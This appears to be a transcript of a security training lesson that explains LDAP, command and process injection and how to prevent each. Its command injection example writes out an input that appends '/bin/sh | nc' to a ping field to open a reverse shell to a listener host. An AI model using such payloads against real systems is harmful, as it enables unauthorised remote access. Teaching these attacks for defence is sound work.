In this lesson, we're going to discuss some common injection attacks, including LDAP injections, command injections, and process injections. First, we have LDAP injections. LDAP, or the Lightweight Directory Access Protocol, is an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network. LDAP is often used for authentication and storing information about users, groups, and applications. An LDAP injection is an application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input. For example, if a web application uses LDAP as part of the user login process, an attacker could perform an LDAP injection to search for the users on that server by injecting queries into the LDAP search, similar to how an attacker inserts malicious queries into an SQL injection. For example, if the backend code for the server used the following code, string LDAP search equals cn equals search name, system out println LDAP search, this could actually allow an attacker to simply enter a wildcard character of star into the username field, and that would then be inserted as the search parameter and display all of your users on the system to your screen. To protect yourself against an LDAP injection attack, you should always use input validation and input sanitization, just like we do to protect ourselves from an SQL injection or an XML injection. Second, we have a command injection. Now, a command injection occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application. For example, if you have a web application that allows a user to test the connectivity with a remote website or server by simply entering in the IP address or host name, and then on the back end, you're going to use the ping command, this could be subject to a command injection by simply appending a command to the app. For example, your application in this website might have a form that's going to allow you to enter an IP address, and the web application then takes that input and adds it to the ping command to execute it on your server. So if I enter deontraining.com and hit the button, it's going to send that over and become ping deontraining.com. But if instead I decide to enter deontraining.com and hostname into that field, this will create a command of ping deontraining.com and hostname that's going to be executed by the server shell. This would then return the result of the ping command and then display the hostname of that server. If I wanted to make this a little bit more malicious, I can instead use something like deontraining.com and /bin/sh pipe nc hack.deontraining.com 443. This would then ping deontraining.com and then move to the second command, which is starting up a shell and redirecting it over to netcat to a listener that I have set up at hack.deontraining.com over port 443. This would essentially give me full interactive access to this web server by running this simple command injection against that vulnerable server. As you probably guessed, just like SQL injections, XML injections, and LDAP injections, you can also prevent command injections by conducting proper input validation on input received from any of your users. In the case of this web application, we should only accept IP addresses or a domain name as input, and we should only allow those to be pinged using this application, and anything after the .com or the final octet should just be ignored or it's not sent over to that ping command. Third, we have process injections. Now, process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system or network resources, and possibly even elevated privileges. Execution via process injection may also evade detection from security products because execution is masked under a legitimate process. Now, there are many different ways to inject code into a process. Many of these will abuse legitimate functionalities as well. This includes injection through DLLs, thread execution hijacking, process hollowing, process doppelganging, asynchronous procedure calls, and portable execution injections. To mitigate against process injections, you should use endpoint security solutions that are configured to block common sequences of attack behavior, you can utilize a security kernel module, and you can utilize the practice of least privilege.